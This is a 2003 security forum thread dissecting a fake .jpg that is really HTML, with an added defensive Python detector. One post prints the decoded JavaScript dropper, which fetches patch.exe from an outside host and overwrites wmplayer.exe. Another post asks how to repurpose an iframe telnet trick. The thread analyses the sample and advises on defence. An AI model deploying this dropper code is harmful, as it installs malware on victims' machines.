-
October 28th, 2003, 01:31 AM
#11
Yes, that's right, it just "hid" in the .jpg. I am inclined to agree that we are looking at a disguised executable here (and our friend Gore certainly thinks that britney is executable).
I was a bit worried when I saw the .jpg description on its own!
Cheers
-
October 28th, 2003, 11:56 AM
#12
Banned
Like the mokkel.jpg file this file is also an html file (according to bash)
Code:
knoppix@ttyp1[knoppix]$ file britney.jpg
britney.jpg: HTML document text
Attached is the text.
-
October 28th, 2003, 01:13 PM
#13
* Kills "reset message" button *
EDIT: Removed the URL encoded text because your browser evaluates it anyway
URL Decoded (Same as someone pasted earlier)
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
I don't have time to fully decompile it, but it looks pretty clever.
- Noia
With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .: Bring OS X to x86!:.
And no one can remember the gentle features in the queen's face that fair day when the land here rested in holy peace and everyone had love to love with.
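An added example, not part of the thread or any poster's code: a defender-side check that does what `file` did in post #12 and then looks for the strings from the decoded script in post #13. The sample inputs, the `unescape()` wrapper around the encoded text and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

JPEG_MAGIC = b"\xff\xd8\xff"  # every JPEG file starts with these bytes
HTML_HINT = re.compile(rb"<\s*(html|script|iframe|body)\b", re.I)
# Strings taken from the decoded script quoted in the thread.
DROPPER_STRINGS = ("ActiveXObject", "Microsoft.XMLHTTP", "ADODB.Stream", "SaveToFile")


def classify(name: str, data: bytes) -> dict:
    """Compare what the extension claims with what the bytes actually are."""
    claims_jpeg = name.lower().endswith((".jpg", ".jpeg"))
    is_jpeg = data.startswith(JPEG_MAGIC)
    looks_html = bool(HTML_HINT.search(data[:4096]))
    # The script was posted URL-encoded, so decode before searching;
    # unquote() leaves text without %XX escapes unchanged.
    decoded = unquote(data.decode("latin-1")).lower()
    hits = [s for s in DROPPER_STRINGS if s.lower() in decoded]
    mismatch = claims_jpeg and not is_jpeg
    return {
        "name": name,
        "mismatch": mismatch,
        "looks_html": looks_html,
        "indicators": hits,
        "suspicious": mismatch and (looks_html or bool(hits)),
    }


def pct(text: str) -> str:
    """Percent-encode every byte, so no keyword survives in the raw file."""
    return "".join("%%%02X" % b for b in text.encode())


# Constructed samples: a minimal JPEG header, and an HTML page saved as .jpg
# whose script body is fully percent-encoded (inert fragment, no URL).
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
FAKE_JPG = ('<html><script>document.write(unescape("'
            + pct('var s = new ActiveXObject("ADODB.Stream");')
            + '"))</script></html>').encode()

if __name__ == "__main__":
    for fname, blob in (("photo.jpg", REAL_JPG), ("britney.jpg", FAKE_JPG)):
        print(classify(fname, blob))
```

The extension check alone only says the file is not a JPEG; the decoded-string hits are what tie it to the script behaviour discussed in the thread.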
-
November 4th, 2003, 11:38 AM
#14
Well from what is being said, pretty soon methinks that the internet will not be a safe place to wander around..
It's like a mine field, one wrong click of that mouse and BOOOOOOOM..
You got a Virus, Worm or you've had your system crashed..
Anyhow whenever I'm in IRC I don't click none of those cheesy links, no matter how big the temptation would be..
Because it will either be just another lame Porn site, or to something that doesn't interest me..
But by the way it looks I'm glad that I didn't click that link now..
I was so fruitin close to clickin it just to calm my curiosity..
Anyhow
Cheers
-
November 4th, 2003, 10:05 PM
#15
Senior Member
Originally posted here by creative_32X_mx
Well from what is being said, pretty soon methinks that the internet will not be a safe place to wander around..
It's like a mine field, one wrong click of that mouse and BOOOOOOOM..
You got a Virus, Worm or you've had your system crashed..
Anyhow whenever I'm in IRC I don't click none of those cheesy links, no matter how big the temptation would be..
Because it will either be just another lame Porn site, or to something that doesn't interest me..
But by the way it looks I'm glad that I didn't click that link now..
I was so fruitin close to clickin it just to calm my curiosity..
Anyhow
Cheers
If you're referring to the britney virus, then it was smart not clicking. As they say "curiosity killed the cat".
-
November 5th, 2003, 04:19 AM
#16
Originally posted here by Viper2026
If you're referring to the britney virus, then it was smart not clicking. As they say "curiosity killed the cat".
Well unless you're a pussy you won't have much to worry about then right? Just use a *NIX box that you don't have hooked up online and you can prolly take this virii apart and see what's inside it.
-
November 5th, 2003, 04:43 AM
#17
Besides the obvious (NOT clicking unknown links), what can an average user do to prevent this kind of infection?
I know that by email, if you disable the win option 'hide file extensions for known file types', you get to see the entire thing you're about to download, but in this case what can we do?
Is disabling ActiveX downloads enough?
We shouldn't need to be suspicious about everything, virii makers suck!
-
November 5th, 2003, 04:46 AM
#18
I just modified that mokkel file so that it only does one telnet session so now if I want to telnet to a certain site I just go to that page. I was wondering what does the chr(34) do in this line:
document.write("<iframe src=" + chr(34) + "telnet://sdf.lonestar.org:23" + chr(34) + ">")
I thought maybe it had something to do with the length of the string but that doesn't seem to be the case. And is there a way to prompt for input so I can change the entry of the site to anything I want. Just trying to make use of something bad.
-
November 5th, 2003, 05:39 AM
#19
Senior Member
Originally posted here by h3r3tic
I just modified that mokkel file so that it only does one telnet session so now if I want to telnet to a certain site I just go to that page. I was wondering what does the chr(34) do in this line:
document.write("<iframe src=" + chr(34) + "telnet://sdf.lonestar.org:23" + chr(34) + ">")
I thought maybe it had something to do with the length of the string but that doesn't seem to be the case. And is there a way to prompt for input so I can change the entry of the site to anything I want. Just trying to make use of something bad.
Well I know that there is a javascript iframe exploit with IE, that I don't think has been officially patched, so it looks as if that is calling telnet, and then it probably tells it to repeat somewhere else in the code (I haven't looked at it myself)
-
November 5th, 2003, 05:46 AM
#20
Originally posted here by Sm0kinP0t
Besides the obvious (NOT clicking unknown links), what can an average user do to prevent this kind of infection?
Not open attachments called "****MyPC.exe". Not open ANY attachments they aren't expecting. When they get an attachment, ask the person if they really sent it to them to be sure. Install, update and run anti virii, install, update and run a firewall, delete Windows, use Linux or any other OS on earth, take a computer basics class, read a computer book and LEARN.
I know that by email, if you disable the win option 'hide file extensions for known file types', you get to see the entire thing you're about to download, but in this case what can we do?
Not use Outlook or any other Windows email client honestly. That stupid preview **** really gets ya.
Is disabling ActiveX downloads enough?
Prolly not
We shouldn't need to be suspicious about everything, virii makers suck!
If it wasn't for virus writers, Norton would never make a penny, their anti virii is their main product. I've had virii before, well a few times from opening them myself knowing what they were. Virus writers are NOT the problem, OS writers ARE. I've met a few virii writers who do not release their viruses for infection, but more or less turn it into an art form, and also for playing jokes. The original virii created on computers were on UNIX boxes and did basically one thing, play pranks.
That's all they usually are still. If your server gets taken down by this prank, then learn to update your software or not use Windows, which is what they write virii for. Why do they do that? Well, almost everyone uses Windows, so why go for anything else? Besides it's fun when Bill Gates blushes